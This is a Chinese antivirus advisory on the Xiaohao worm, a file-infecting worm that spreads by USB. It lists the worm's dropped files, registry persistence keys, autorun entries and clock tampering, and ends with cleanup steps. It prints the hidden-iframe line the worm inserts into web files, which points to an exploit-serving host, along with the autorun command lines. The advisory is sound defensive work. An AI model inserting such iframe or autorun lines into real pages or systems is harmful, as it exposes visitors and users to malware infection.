一、病毒描述：
　　今日，DSW Lab Avert小组监测到一个具备较强破坏力的名为小浩的蠕虫病毒开始传播，该病毒类似此前曾肆虐网络的熊猫烧香病毒，破坏性感染系统文件，并在受害者系统上遍历网页/脚本文件，插入带毒的网址。因为病毒的破坏性感染行为，导致被感染文件无法修复，严重被感染系统无法使用，会导致用户无法开机现象。

　　 感染效果截图：

　　二、病毒基本情况：
　　      病毒名称：Worm.Win32.Xiaohao.a
　　      病毒别名：小浩
　　      病毒类型：蠕虫
　　      危害级别：4
　　      感染平台：Windows 平台
　         编写语言：C/C++

　　三、病毒行为：
　　1、当病毒体在被感染的系统上激活后，会在磁盘跟目录释放autorun.inf等文件，感染U盘等移动设备：
　　     %DRIVE%\autorun.inf 文件属性：H
　　     %DRIVE%\Xiaohao.exe 文件属性：H

　　 2、同时在跟目录释放一个名为Jilu.txt文件，记录了相关感染文件列表。
　    3、拷贝自身到系统目录下，全路径： %SystemRoot%\system32\exloroe.exe
　    4、将自动加入到注册表启动项确保自身启动激活：

　　      键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components
　　      键名：{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
　　      键值：%SystemRoot%\system32\exloroe.exe

　     5、将系统时间修改为2005年1月17日，会导致部分杀毒软件和其他正版软件因授权问题无法激活。
      
　    6、全盘搜索扩展名为*.jsp、*.php、 *.aspx、 *.asp、 *.html、 *.htm的文件，向其中插入病毒网址。
        　      <iframe src=http://xiaohao.yona.biz/*.htm width=0 height=0></iframe>
       其中该恶意页面利用多个系统漏洞针对Windows 2000/XP/2003进行有针对性的挂马。

       恶意页面的代码截图：

       7、其它行为：
       修改注册表使系统无法正常浏览隐藏文件，修改注册表劫持正常的EXE运行，使得运行一些文件会先运行蠕虫自身： 
        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWAL
       shell\Auto\command=Xiaohao.exe
       shellexecute=Xiaohao.exe
       open=Xiaohao.exe
　　当用户打开感染的文件夹时，资源管理器标题会被修改成：已中毒 X14o-H4o's Virus

　　四、解决方案
　  1、超级巡警已经紧急升级，请广大用户升级到最新特征库来预防病毒。
　  2、对于网页被感染的用户，可以使用超级巡警的垃圾清理功能来批量修复被感染的网页，具体功能垃圾清理→智能扫描→清除指定代码，勾选后填入病毒植入的恶意网页，点击扫描→清除即可。
　　3、不要运行来历不明的文件。